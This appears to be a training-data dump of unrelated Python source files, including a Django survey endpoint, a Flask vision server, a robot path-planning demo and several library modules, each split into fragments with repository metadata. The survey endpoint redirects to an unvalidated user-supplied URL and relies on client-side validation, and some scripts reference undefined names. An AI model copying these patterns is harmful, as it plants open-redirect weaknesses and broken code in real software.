Form submission post-back endpoint.
NOTE: We do not have a formal definition of a Survey Form, it's just some authored HTML
form fields (via Django Admin site). Therefore we do not do any validation of the submission server side. It is
assumed that all validation is done via JavaScript in the survey.html file
"""
survey = SurveyForm.get(survey_name, throw_if_not_found=False)
if not survey:
return HttpResponseNotFound()
answers = {}
for key in request.POST.keys():
# support multi-SELECT form values, by string concatenating them with a comma separator
array_val = request.POST.getlist(key)
answers[key] = request.POST[key] if len(array_val) == 0 else ','.join(array_val)
# the URL we are supposed to redirect to is
# in a hidden for
|
m field
redirect_url = answers['_redirect_url'] if '_redirect_url' in answers else reverse('dashboard')
course_key = CourseKey.from_string(answers['course_id']) if 'course_id' in answers else None
allowed_field_names = survey.get_fiel
|
d_names()
# scrub the answers to make sure nothing malicious from the user gets stored in
# our database, e.g. JavaScript
filtered_answers = {}
for answer_key in answers.keys():
# only allow known input fields
if answer_key in allowed_field_names:
filtered_answers[answer_key] = escape(answers[answer_key])
survey.save_user_answers(request.user, filtered_answers, course_key)
response_params = json.dumps({
# The HTTP end-point for the payment processor.
"redirect_url": redirect_url,
})
return HttpResponse(response_params, content_type="text/json")
|
agmscode/agms_python
|
agms/util/requests_client.py
|
Python
|
mit
| 509
| 0.001965
|
from __future__ import absolute_import
from agms.exception.not_found_exception import NotFoundException
try:
import requests
except ImportError as e:
raise NotFoundException(e)
class RequestsClient(object):
def http_do(self, http_verb, url, headers, request_body):
response = requests.request(
http_verb,
url,
h
|
eaders=headers,
data=request_body,
verify=True
)
return [respons
|
e.status_code, response.text]
|
langara/MyBlocks
|
picon.py
|
Python
|
apache-2.0
| 3,366
| 0.007427
|
#!/usr/bin/env python
"""Small tool for copying android icons from material-design-icons repo to specified android gradle module.
It copies all density versions of png files to appropriate res subdirectories.
Usage:
picon.py add <category> <name> [-i <path>] [-o <path>] [-c <color>] [-s <size>]
picon.py rem <name> [-o <path>] [-c <color>] [-s <size>]
picon.py (-h | --help)
picon.py (-v | --version)
Options:
-c, --color <color> Which color version to use (black or white or all) [default: all]
-s, --size <size> Which size to use (number in dp units or 'all') [default: all]
-i, --input <path> Path where local copy of material-design-icons repo is located [default: /media/data/android_big/material-design-icons]
-o, --output <path> Path of top android module directory where icons will be copied [default: /home/marek/code/android/MyBlocks/myres]
-h, --help Show help screen.
-v, --version Show version.
Commands:
add: copy new icon from material-design-icons repo to android module
rem: remove all versions of given icon from android module
"""
VERSION='0.1.0'
try:
from docopt import docopt
except ImportError:
print 'This script needs a "docopt" module (http://docopt.org)'
raise
from shutil import copyfile
from os import remove
from os import mkdir
from os.path import join
from os.path import isdir
densities = [
"mdpi",
"hdpi",
"xhdpi",
"xxhdpi",
"xxxhdpi",
]
def add(category, name, color, size, inp, outp):
if color == "all":
add(category, name, "black", size, inp, outp)
add(category, name, "white", size, inp, outp)
return
if size == "all":
add(category, name, color, "18", inp, outp)
add(category, name, color, "24", inp, outp)
add(category, name, color, "36", inp, outp)
add(category, name, color, "48", inp, outp)
return
name = name + "_" + color + "_" + size + "dp.png"
for density in densities:
idir = join(inp, category, "drawable-" + density)
odir = join(outp, "src", "main", "res", "drawable-"
|
+ density)
if not isdir(odir):
mkdir(odir)
copyfile(join(idir, name), join(odir, name))
def rem(name, color, size, outp):
if color == "all":
rem(name, "black", size, outp)
rem(name, "white", size, outp)
return
if size == "all":
rem(name, co
|
lor, "18", outp)
rem(name, color, "24", outp)
rem(name, color, "36", outp)
rem(name, color, "48", outp)
return
name = name + "_" + color + "_" + size + "dp.png"
for density in densities:
ofile = join(outp, "src", "main", "res", "drawable-" + density, name)
try:
remove(ofile)
except OSError:
print "Can not remove:", ofile
def main():
argdict = docopt(__doc__, version=VERSION)
if argdict["add"]:
add(argdict["<category>"], argdict["<name>"], argdict["--color"], argdict["--size"], argdict["--input"], argdict["--output"])
elif argdict["rem"]:
rem(argdict["<name>"], argdict["--color"], argdict["--size"], argdict["--output"])
if __name__ == '__main__':
main()
|
awickert/river-network-evolution
|
backup/run_ThreeChannels_generalizing.py
|
Python
|
gpl-3.0
| 3,834
| 0.021127
|
import numpy as np
from scipy.sparse import spdiags, block_diag
from scipy.sparse.linalg import spsolve, isolve
from matplotlib import pyplot as plt
import copy
import time
import ThreeChannels_generalizing
reload(ThreeChannels_generalizing)
r = ThreeChannels_generalizing.rnet()
self = r
plt.ion()
# PER RIVER #
#############
self.eta = []
self.nx = 1E2 + 1
#######################
### INPUT VARIABLES ###
#######################
# GLOBAL UNIFORM #
##################
self.D = 200E-3 # [m] [uniform so far]
porosity = lambda_p = 0.35 # [-]
n_time_steps = 10
self.flow_from_to = np.array([[0,2],[1,2]])
self.flow_from = [[], [], [0,1]]
self.flow_to = [[2], [2], []]
self.b = [20, 20, 40]
self.segment_Q_in = self.headwaters_segments = np.array([[0,40],[1,20]])
self.nsegments = len(self.flow_from)
#self.flow_from_to = np.array([[0,1]])
#self.flow_from = [[], [0]]
#self.flow_to = [[1], []]
self.flow_from_to = np.array([[0,2],[1,2],[2,4],[3,4]])
self.flow_from = [[], [], [0,1], [], [2,3]]
self.flow_to = [[2], [2], [4], [4], []]
self.b = [20, 20, 40, 20, 60]
#self.b = [20, 30, 50, 10, 60]
self.segment_Q_in = self.headwaters_segments = np.array([[0,40],[1,20],[3,50]])
"""
self.flow_from_to = np.array([[0,1]])
self.flow_from = [[], [0]]
self.flow_to = [[1], []]
#self.b = [20, 20, 40, 20, 60]
self.b = [20, 20]
"""
# 3 rivers -- would often pull them in from GIS
# Keep everything uniform for starters
xmax = 1E3
self.B = 100 * np.ones(self.nx)
S = 1E-2
self.dt = 3.15E0
self.x = []
self.dx = []
self.h = []
self.eta = []
# Multiple rivers
for Si in range(len(self.flow_to)):
self.x.append(np.linspace(0, xmax, self.nx))
self.dx.append(np.mean(np.diff(self.x[-1]))) # Special case of uniform grid spacing
self.h.append(2. * np.ones(self.nx)) # specific case of 2 m depth everywhere
#self.x[-1] += self.x[-2][-1] + self.dx[-1] #Very specific to this 3-river set here
self.x[-3] += self.x[1][-1] + self.
|
dx[-1] #Very specific to this 5-ri
|
ver set here
self.x[-2] += self.x[1][-1] + self.dx[-1] #Very specific to this 5-river set here
self.x[-1] += self.x[2][-1] + self.dx[-1] #Very specific to this 5-river set here
#self.x[-1] += self.x[-2][-1] + self.dx[-1] #Very specific to this 2-river set here
for row in self.x:
self.eta.append( -S * row + np.max(self.x)*S )
self.eta[-1] = np.round(self.eta[-1], 6) # coarse trick to rmv floating point issues
self.eta0 = copy.deepcopy(self.eta)
#########################
### DERIVED VARIABLES ###
#########################
self.nts = np.linspace(0, n_time_steps, n_time_steps+1) # start at 1 below, t0 is initial
self.A0 = []
for Si in range(len(self.x)):
self.A0.append( 11.325 / (1 - lambda_p) * self.h[Si]/self.D )
#q_s_in = 0.69623693 # [m^3 s^{-1}]
# q_s for equilibrium in each channel; used for transport slope upstream
# boundary conditions
#q_s_out = whatever it has to be to transport out as much material as it receives
q_s_equilibrium = np.array(self.sediment__discharge_per_unit_width())
#print np.mean(eta)
# Ignoring for now -- for iterating
# Assuming in order: so flow_from is really irrelavant; flow_to is the important part
"""
fig = plt.figure()
plt.ylim((0,50))
ax = plt.subplot(111)
"""
#for row in self.eta:
# row += 10
for ts in range(10):#self.nts:
# 3 iterations is usually good; nothing special about it, though.
self.eta_iter = copy.deepcopy(self.eta) # For iteration
self.stack_vars()
for iter_i in range(20):
self.build_coeff_matrix(q_s_equilibrium)
self.build_RHS()
#print np.max(np.hstack(self.eta_iter))
self.solve()
self.update()
"""
ax.clear()
if ts % 25 == 0:
self.riverplot(linewidth=2)
#plt.ylim((0,40))
#plt.draw()
plt.pause(0.0001)
"""
self.stack_vars()
#self.plot_coeff_matrix()
#plt.ylim((0,40))
self.riverplot(linewidth=4, plot_start=True)
plt.show()
|
redhat-performance/tuned
|
tuned/profiles/functions/function_cpulist_present.py
|
Python
|
gpl-2.0
| 691
| 0.023155
|
import os
import tuned.logs
from . import base
from tuned.utils.commands import commands
log = tuned.logs.get()
class cpulist_present(base.Function):
"""
Checks whether CPUs from list are present, returns list containing
only present CPUs
"""
def __init__(self):
# arbitrary number of arguments
super(cpulist_present, self).__init__("cpulist_present", 0)
def execute(self, args):
if not super(cpulist_present,
|
self).execute(args):
return None
cpus = self
|
._cmd.cpulist_unpack(",,".join(args))
present = self._cmd.cpulist_unpack(self._cmd.read_file("/sys/devices/system/cpu/present"))
return ",".join(str(v) for v in sorted(list(set(cpus).intersection(set(present)))))
|
inventree/InvenTree
|
InvenTree/plugin/plugin.py
|
Python
|
mit
| 2,145
| 0.000932
|
# -*- coding: utf-8 -*-
"""
Base Class for InvenTree plugins
"""
import warnings
from django.db.utils import OperationalError, ProgrammingError
from django.utils.text import slugify
class InvenTreePluginBase():
"""
Base class for a plugin
DO NOT USE THIS DIRECTLY, USE plugin.IntegrationPluginBase
"""
def __init__(self):
pass
# Override the plugin name for each concrete plugin instance
PLUGIN_NAME = ''
PLUGIN_SLUG = None
PLUGIN_TITLE = None
def plugin_name(self):
"""
Name of plugin
"""
return self.PLUGIN_NAME
def plugin_slug(self):
"""
Slug of plugin
If not set plugin name slugified
"""
slug = getattr(self, 'PLUGIN_SLUG', None)
if slug is None:
slug = self.plugin_name()
return slugify(slug.lower())
def plugin_title(self):
"""
Title of plugin
"""
if self.PLUGIN_TITLE:
return self.PLUGIN_TITLE
else:
return self.plugin_name()
def plugin_config(self, raise_error=False):
"""
Return the PluginConfig object associated with this plugin
"""
try:
import plugin.models
cfg, _ = plugin.models.PluginConfig.objects.get_or_create(
key=self.plugin_slug(),
name=self.plugin_name(),
)
except (OperationalError, ProgrammingError) as error:
cfg = None
if raise_error:
raise error
return cfg
def is_active(self):
"""
Return True if this plugin is currently active
"""
cfg
|
= self.plugin_config()
if cfg:
return cfg.active
else:
return False
# TODO @matmair remove after InvenTree 0.7
|
.0 release
class InvenTreePlugin(InvenTreePluginBase):
"""
This is here for leagcy reasons and will be removed in the next major release
"""
def __init__(self):
warnings.warn("Using the InvenTreePlugin is depreceated", DeprecationWarning)
super().__init__()
|
jackfirth/pyramda
|
pyramda/math/product.py
|
Python
|
mit
| 147
| 0
|
from pyra
|
mda.function.curry import curry
from pyramda.iterable.reduce import reduce
fr
|
om .multiply import multiply
product = reduce(multiply, 1)
|
3299/visioninabox
|
server.py
|
Python
|
mit
| 2,744
| 0.027697
|
#!/usr/bin/env python
import json, time
from flask import Flask, request, render_template, Response
from gevent import pywsgi, monkey
from helpers.generateCalibration import GenerateCalibration
#monkey.patch_all()
app = Flask(__name__)
#cameraInstance = Camera()
runCalibration = GenerateCalibration('frames', 'calibration.json')
class VisionServer:
def __init__(self, queue):
self.inQueue = queue
@app.route('/')
def index():
return render_template('index.html')
@app.route('/hsl')
def hslPage():
return render_template('hsl.html')
@app.route('/calibrate')
def calibratePage():
return render_template('calibrate.html')
def genStream(camera):
while True:
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + camera.get_frame() + b'\r\n')
time.sleep(0.005) # yes, this delay is intentional.
# maybe it's a hack, but hey, it works.
@app.route('/stream')
def stream():
return Response(genStream(cameraInstance), mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/post', methods=['POST'])
def post():
if (request.form['action'] == 'changeHSL'):
cameraInstance.changeHSL({'component': request.form['component'], 'min': request.form['min'], 'max': r
|
equest.form['max']})
elif (request.form['action'] == 'getHSL'):
return json.dumps(cameraInstance.getHSL())
elif (r
|
equest.form['action'] == 'saveHSL'):
return str(cameraInstance.saveHSL())
elif (request.form['action'] == 'setExposure'):
return str(cameraInstance.setExposure(int(request.form['exposure'])))
elif (request.form['action'] == 'on' or request.form['action'] == 'off'):
if (request.form['action'] == 'on'):
visionController.start()
else:
visionController.stop()
return str(True);
return str(True)
@app.route('/capture')
def capture():
# makes directory if it doesn't exist
if not os.path.exists('frames'):
os.makedirs('frames')
# finds the highest int in filenames
maxN = 0
if (os.listdir('frames')):
files = os.listdir('frames')
for file in files:
this = file.split('.')[0]
if (this != ''):
if (int(this) > maxN):
maxN = int(this)
return str(cameraInstance.saveFrame('frames/' + str(maxN + 1) + '.jpg'))
@app.route('/calibrate')
def calibrate():
return str(runCalibration.run())
if __name__ == '__main__':
gevent_server = pywsgi.WSGIServer(('', 80), app)
gevent_server.serve_forever()
|
qedi-r/home-assistant
|
homeassistant/components/simplisafe/alarm_control_panel.py
|
Python
|
apache-2.0
| 5,527
| 0.000543
|
"""Support for SimpliSafe alarm control panels."""
import logging
import re
from simplipy.entity import EntityTypes
from simplipy.system import SystemStates
from homeassistant.components.alarm_control_panel import (
FORMAT_NUMBER,
FORMAT_TEXT,
AlarmControlPanel,
)
from homeassistant.components.alarm_control_panel.const import (
SUPPORT_ALARM_ARM_AWAY,
SUPPORT_ALARM_ARM_HOME,
)
from homeassistant.const import (
CONF_CODE,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_DISARMED,
)
from homeassistant.util.dt import utc_from_timestamp
from . import SimpliSafeEntity
from .const import DATA_CLIENT, DOMAIN
_LOGGER = logging.getLogger(__name__)
ATTR_ALARM_ACTIVE = "alarm_active"
ATTR_BATTERY_BACKUP_POWER_LEVEL = "battery_backup_power_level"
ATTR_GSM_STRENGTH = "gsm_strength"
ATTR_LAST_EVENT_INFO = "last_event_info"
ATTR_LAST_EVENT_SENSOR_NAME = "last_event_sensor_name"
ATTR_LAST_EVENT_SENSOR_TYPE = "last_event_sensor_type"
ATTR_LAST_EVENT_TIMESTAMP = "last_event_timestamp"
ATTR_LAST_EVENT_TYPE = "last_event_type"
ATTR_RF_JAMMING = "rf_jamming"
ATTR_WALL_POWER_LEVEL = "wall_power_level"
ATTR_WIFI_STRENGTH = "wifi_strength"
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up a SimpliSafe alarm control panel based on existing config."""
pass
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up a SimpliSafe alarm control panel based on a config entry."""
simplisafe = hass.data[DOMAIN][DATA_CLIENT][entry.entry_id]
async_add_entities(
[
SimpliSafeAlarm(simplisafe, system, entry.data.get(CONF_CODE))
for system in simplisafe.systems.values()
],
True,
)
class SimpliSafeAlarm(SimpliSafeEntity, AlarmControlPanel):
"""Representation of a SimpliSafe alarm."""
def __init__(self, simplisafe, system, code):
"""Initialize the SimpliSafe alarm."""
super().__init__(system, "Alarm Control Panel")
self._changed_by = None
self._code = code
self._simplisafe = simplisafe
self._state = None
# Some properties only exist for V2 or V3 systems:
for prop in (
ATTR_BATTERY_BACKUP_POWER_LEVEL,
ATTR_GSM_STRENGTH,
ATTR_RF_JAMMING,
ATTR_WALL_POWER_LEVEL,
ATTR_WIFI_STRENGTH,
):
if hasattr(system, prop):
self._attrs[prop] = getattr(system, prop)
@property
def changed_by(self):
"""Return info about who changed the alarm last."""
return self._changed_by
@property
def code_format(self):
"""Return one or more digits/characters."""
if not self._code:
return None
if isinstance(self._code, str) and re.search("^\\d+$", self._code):
return FORMAT_NUMBER
return FORMAT_TEXT
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
return SUPPORT_ALARM_ARM_HOME | SUPPORT_ALARM_ARM_AWAY
def _validate_code(self, code, state):
"""Validate given code."""
check = self._code is None or code == self._code
if not check:
_LOGGER.warning("Wrong code entered for %s", state)
return check
async def async_alarm_disarm(self, code=None):
"""Send disarm command."""
if not self._validate_code(code, "disarming"):
return
await self._system.set_off()
async def async_alarm_arm_home(self, code=None):
"""Send arm home command."""
if not self._validate_code(code, "arming home"):
return
await self._system.set_home()
async def async_alarm_arm_away(self, code=None):
"""Send arm away command."""
if not self._validate_code(code, "arming away"):
return
await self._system.set_away()
async def async_update(self):
"""Update alarm status."""
event_data = self._simplisafe.last_event_
|
data[self._system.system_id]
if event_data.get("pinName"):
self._changed_by = event_data["pinName"]
if self._system.state == SystemStates.error:
self._online = False
return
self._online = True
if self._system.state == SystemStates.off:
self._state = STATE_ALARM_DISA
|
RMED
elif self._system.state in (SystemStates.home, SystemStates.home_count):
self._state = STATE_ALARM_ARMED_HOME
elif self._system.state in (
SystemStates.away,
SystemStates.away_count,
SystemStates.exit_delay,
):
self._state = STATE_ALARM_ARMED_AWAY
else:
self._state = None
last_event = self._simplisafe.last_event_data[self._system.system_id]
self._attrs.update(
{
ATTR_ALARM_ACTIVE: self._system.alarm_going_off,
ATTR_LAST_EVENT_INFO: last_event["info"],
ATTR_LAST_EVENT_SENSOR_NAME: last_event["sensorName"],
ATTR_LAST_EVENT_SENSOR_TYPE: EntityTypes(last_event["sensorType"]).name,
ATTR_LAST_EVENT_TIMESTAMP: utc_from_timestamp(
last_event["eventTimestamp"]
),
ATTR_LAST_EVENT_TYPE: last_event["eventType"],
}
)
|
TheCamusean/DLRCev3
|
scripts/benchmarks/demo3.py
|
Python
|
mit
| 27,312
| 0.028412
|
#Euclidean path planning control with Kalman filter for localization
import time
import cv2
from ev3control.rpc import Robot
from rick.controllers import *
from rick.A_star_planning import *
from rick.core import State
from rick.core import main_loop
from rick.async import AsyncCamera
from rick.utils import TrackerWrapper, bbox_center
from nn_object_detection.object_detectors import NNObjectDetector
from rick.live_plotting import MapRenderer
from detection.marker_localization import get_marker_pose, load_camera_params
import cv2.aruco as aruco
from dlrc_one_shot_learning.similarity_detectors import EuclidianNNFeaturesBrickFinder, VAESimilarityDetector
from rick.mc_please_github_donot_fuck_with_this_ones import A_star_path_planning_control,compute_A_star_path, A_star_control
import numpy as np
from math import pi
from sklearn.mixture import GaussianMixture
from detection.opencv import get_lego_boxes, eliminate_grip
# from clustering import BBoxKMeansClustering
from rick.motion_control import euclidian_kalman , kalman_filter , kalman_filter2 , robot_control, odom_estimation
import sys
sys.path.append("../slam/")
import mapping
import matplotlib.pyplot as plt
from detection.opencv import detect_purple
PATH_TO_CKPT = "/home/julen/dlrc_models/frozen_inference_graph.pb"
PATH_TO_LABELS = "/home/dlrc/projects/DLRCev3/object_detection/nn_object_detection/tf_train_dir/data/label_map.pbtxt"
print("Creating robot...")
data = np.load('Homographygood.npz')
H=data["arr_0"]
map_renderer = MapRenderer()
object_detector = NNObjectDetector(PATH_TO_CKPT, PATH_TO_LABELS)
similarity_detector = VAESimilarityDetector()
clustering_alg = GaussianMixture(n_components=4)
NUM_CLUSTERS = 2
def acquire_target(robot, frame, **kwargs):
"""Callback for acquiring a lego target."""
BB_legos = get_lego_boxes(frame)
# We wait until there's only one lego in view
if len(BB_legos) == 1:
print("found a brick")
bboxes = [frame[bbox[0]:bbox[2], bbox[1]:bbox[3]] for bbox in BB_legos]
robot.target = bounding_box_features = similarity_detector.extract_features(bboxes)[0]
return "SEARCH_TARGET", frame, {}
else:
print(len(BB_legos))
return "ACQUIRE_TARGET", frame, {}
def plot_mapa(mapa,robot_traj):
mapa1 = np.array(mapa)
rob = np.array(robot_traj)
print("Before stop")
if mapa1.size:
print("In")
plt.scatter(mapa1[:,0],mapa1[:,1])
print("Out")
if rob.size > 100:
plt.plot(rob[:,0],rob[:,1])
plt.axis([-100, 150, -100, 150])
plt.legend(["Lego", "path"])
plt.show()
print("After stop")
def search_control(state_search,mapa, pos_rob, t_old):
t1 = 0
if state_search ==1:
target = [0.1,0.1]# THE POINT REPRESENTS THE MIDDLE OF THE WORKSPACE
vel_wheels = robot_control(pos_rob,target, K_x=1,K_y=1,K_an=1)
distance = np.sqrt(np.power(pos_rob[0]-target[0],2) + np.power(pos_rob[1]-target[1],2))
if distance < 10:
state_search = 2
t1 = time.time()
elif state_search ==2:
vel_wheels = [100,100]
return vel_wheels,state_search,t1
def naive_obstacle_avoidance_control(mapa, pos_rob):
max_dist = 30
min_angle = -pi/5
max_angle = pi/5
mapa_ar = np.array(mapa)
vel_wheels = [160,150]
for i in range(0, len(mapa)):
er_x = mapa[i][0] - pos_rob[0]
er_y = mapa[i][1] - pos_rob[1]
distance = np.sqrt(np.power(er_x,2) + np.power(er_y,2))
er_angle = np.arctan2(er_y, er_x) - pos_rob[2]*pi/180
if er_angle >pi:
er_angle = er_angle -2*pi
if er_angle < -pi:
er_angle = er_angle +2*pi
next_x = pos_rob[0] + 10*np.cos(pos_rob[2] * pi/180)
next_y = pos_rob[1] + 10*np.sin(pos_rob[2] * pi/180)
if (distance< max_dist and er_angle > min_angle and er_angle< max_angle): # AVOID OBSTACLES
vel_wheels = [-100,100]
break
elif next_x < 0 or next_x > 300 or next_y < 0 or next_y> 300:
vel_wheels = [-100,100]
return vel_wheels
def get_lego_boxes(frame, threshold=0.9, return_closest=False):
#res = object_detector.detect_with_threshold(frame,threshold=threshold, return_closest=return_closest)
#BB_legos = map(lambda x: x[0], res)
#return list(BB_legos)
BB_legos=gl(frame)
return BB_legos
def index23(BB_legos,BB_target):
index=1000
i=0
for box in BB_legos:
if box[0]==BB_target[0][0] and box[1] == BB_target[0][1]:
index = i
i+=1
return index
def search_target_with_Kalman_and_mapping(robot, frame
, ltrack_pos=0, rtrack_pos=0, P=np.identity(3), marker_list = [], delete_countdown = 0 , mapa = [], robot_trajectory = [],R=[],state_search = 2 , t1=0,
t = None,feature_map = [],iteration=0,iteration2=0):
if not t:
t = time.time()
################ THIS IS ALLL
new_ltrack_pos = robot.left_track.position
new_rtrack_pos = robot.right_track.position
odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos
marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]])
frame = eliminate_grip(frame)
BB_legos2=get_lego_boxes(frame)
BB_legos=[]
for bbox in BB_legos2:
if bbox[3]<460 and (bbox[2]<380 or bbox[2]>420):
BB_legos.append(bbox)
image_name="
|
lego_boxes"
for bbox in BB_legos:
image_complete_name="{}_{}{}".format(image_name,iteration,".png")
iteration+=1
input_frame=frame[bbox[1]:bbox[3],b
|
box[0]:bbox[2],:]
cv2.imwrite(image_complete_name,input_frame)
#frame = plot_bbox(frame, bbox)
lego_landmarks = mapping.cam2rob(BB_legos,H)
mtx,dist=load_camera_params()
frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6)
print("####################################################################################")
estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position)
index = 1000
mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,delete_countdown, robot_trajectory, index)
Ts = 0.3
estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P)
robot.position = estim_rob_pos
mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom)
d = np.ones(3)
d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180)
d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180)
d[2] = estim_rob_pos[2]
R.append(d)
box_print = [x + [0] for x in marker_map.tolist()]
map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print)
############################################
print("odom :", estim_rob_pos_odom, "kalmancito" , estim_rob_pos )
#Feature extraction from bounding boxes
image_name2="lego_boxes_no_duplicates"
bboxes = []
for i in range(0,len(links)):
bbox = BB_legos[links[i][0]]
bboxes.append(frame[bbox[1]:bbox[3], bbox[0]:bbox[2],:])
image_complete_name2="{}_{}{}".format(image_name2,iteration2,".png")
iteration2+=1
input_frame2=frame[bbox[1]:bbox[3],bbox[0]:bbox[2],:]
cv2.imwrite(image_complete_name2,input_frame2)
bounding_box_features = similarity_detector.extract_features(bboxes)
for i in range(0,len(links)):
feature_map[links[i][1]] = bounding_box_features[i]
print("SHAPE: ", len(feature_map))
#print("FEAT" , feature_map)
#DEFINE MOTION CONTROL FOR SEARCHING
# THE CONTROL IS : 1. GO TO THE CENTER OF THE WORKSPACE, 2. ROUND FOR 2 secs , SELECT A POINT CLOSE TO THE CENTER as new target
vel_wheels = naive_obstacle_avoidance_control(mapa, robot.position)
iteration+=1
if time.time()-t > 30:
clust_feats=[]
for item in feature_map:
if not np.all(item==0):
clust_feats.append(item)
clustering_alg.fit
|
DmitryFillo/rknfilter
|
rknfilter/targets/store.py
|
Python
|
bsd-2-clause
| 1,324
| 0.002266
|
from rknfilter.targets import BaseTarget
from rknfilter.db import Resource, Decision, CommitEvery
from rknfilter.core import DumpFilesParser
class StoreTarget(BaseTarget):
def __init__(self, *args, **kwargs):
super(StoreTarget, self).__init__(*args, **kwargs)
self._dump_files_parser = DumpFilesParser()
def process(self):
commit = CommitEvery(self._session)
for content, decision, domains, urls, ips, _ in self._dump_files_parser.get_data():
# TODO: move to models?
resource = Resource.get_or_create(self._session, rkn_id=content['rkn_id'])
if resource.id is None:
resource.include_date = content['include_date']
resource.entry_type = content['entry_type']
resource.urgency_type = content['urgency_type']
resource.block_type = content['block_type']
resource.decision = Decision(
date=decision['decision_date'],
org=decision['decision
|
_org'],
num=decision['decision_num']
)
resource.sync_m2m_proxy('domains_list
|
', domains)
resource.sync_m2m_proxy('urls_list', urls)
resource.sync_m2m_proxy('ips_list', ips)
commit()
commit(force=True)
|
praekelt/mc2
|
mc2/forms.py
|
Python
|
bsd-2-clause
| 1,161
| 0
|
from django import forms
from django.contrib.auth.models import User as user_model
from django.contrib.auth.forms import UserCreationForm
from mc2.models import UserSettings
class UserSettingsForm(forms.ModelForm):
settings_level = forms.ChoiceField(
choices=UserSettings.SETTINGS_LEVEL_CHOICES,
widget=forms.RadioSelect())
class Meta:
model = UserSettings
fields = ('settings_level', )
class CreateAccountForm(UserCreationForm):
"""
Form for creating a new user account.
"""
|
first_name = forms.CharField(required=False)
last_name = forms.CharField(required=False)
email = forms.EmailField(required=True)
def clean_email(self):
'''
Validate that the supplied email address is unique for the
s
|
ite.
'''
if user_model.objects.filter(
email__iexact=self.cleaned_data['email']).exists():
raise forms.ValidationError('This email address is already in use.'
' Please supply a different'
' email address.')
return self.cleaned_data['email']
|
wangmiao1981/spark
|
python/pyspark/sql/pandas/map_ops.py
|
Python
|
apache-2.0
| 3,806
| 0.002365
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from pyspark.rdd import PythonEvalType
class PandasMapOpsMixin(object):
"""
Min-in for pandas map operations. Currently, only :class:`DataFrame`
can use this class.
"""
def mapInPandas(self, func, schema):
"""
Maps an iterator of batches in the current :class:`DataFrame` using a Python native
function that takes and outputs a pandas DataFrame, and returns the result as a
:class:`DataFrame`.
The function should take an iterator of `pandas.DataFrame`\\s and return
another iterator of `pandas.DataFrame`\\s. All columns are passed
together as an iterator of `pandas.DataFrame`\\s to the function and the
returned iterator of `pandas.DataFrame`\\s are combined as a :class:`DataFrame`.
Each `pandas.DataFrame` size can be controlled by
`spark.sql.execution.arrow.maxRecordsPerBatch`.
.. versionadded:: 3.0.0
Parameters
----------
func : function
a Python native function that takes an iterator of `pandas.DataFrame`\\s, and
outputs an iterator of `pandas.DataFrame`\\s.
schema : :class:`pyspark.sql.types.DataType` or str
the return type of the `func` in PySpark. The value can be either a
:class:`pyspark.sql.types.DataType` object or a DDL-formatted type string.
Examples
--------
>>> from pyspark.sql.functions import pandas_udf
>>> df = spark.createDataFrame([(1, 21), (2, 30)], ("id", "age"))
>>> def filter_func(iterator):
... for pdf in iterator:
... yield pdf[pdf.id == 1]
>>> df.mapInPandas(filter_func, df.schema).show() # doctest: +SKIP
+---+---+
| id|age|
+---+---+
| 1| 21|
+---+---+
Notes
-----
This API is experimental
See Also
--------
pyspark.sql.functions.pandas_udf
"""
from pyspark.sql import DataFrame
from pyspark.sql.pandas.functions import pandas_udf
assert isinstance(self, DataFrame)
udf = pandas_udf(
func, returnType=schem
|
a, functionType=PythonEvalType.SQL_MAP_PANDAS_ITER_UDF)
udf_column = udf(*[self[col] for col in self.columns])
|
jdf = self._jdf.mapInPandas(udf_column._jc.expr())
return DataFrame(jdf, self.sql_ctx)
def _test():
import doctest
from pyspark.sql import SparkSession
import pyspark.sql.pandas.map_ops
globs = pyspark.sql.pandas.map_ops.__dict__.copy()
spark = SparkSession.builder\
.master("local[4]")\
.appName("sql.pandas.map_ops tests")\
.getOrCreate()
globs['spark'] = spark
(failure_count, test_count) = doctest.testmod(
pyspark.sql.pandas.map_ops, globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE | doctest.REPORT_NDIFF)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
makinacorpus/mapnik2
|
scons/scons-local-1.2.0/SCons/Tool/g++.py
|
Python
|
lgpl-2.1
| 3,111
| 0.0045
|
"""SCons.Tool.g++
Tool-specific initialization for g++.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
